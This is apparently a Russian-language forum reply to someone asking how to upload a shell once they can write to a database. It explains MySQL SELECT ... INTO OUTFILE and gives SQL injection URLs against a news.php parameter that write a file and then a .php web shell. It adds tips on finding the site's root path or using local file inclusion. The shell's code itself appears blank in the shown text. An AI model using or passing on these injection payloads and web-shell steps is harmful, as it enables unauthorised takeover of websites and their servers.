↑
Могу сделать запись в БД,подскажите как залить шел?

2.2.1 Запись в файл
Есть в MYSQL такая интересная функция типа
SELECT … INTO OUTFILE
позволяющая записывать информацию в файл. Либо такая конструкция
SELECT ... INTO DUMPFILE
они почти похоже и можно использовать любую.
Пример:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt' --
Для нее работает несколько ограничений.

• Запрещенно перезаписывание файлов
  
• Требуются привилегии типа FILE
  
• (!)Обязательны настоящие кывычки в указании имени файла

А вот что бы нам мешало сделать веб шел? Вот например так:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --
Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php. Врипринципе можно найти еще одну ошибку по отчету которой будет виден путь на сервере или оставить в корне сервера и подцепить его локальным инклудом, но это уже другая тема.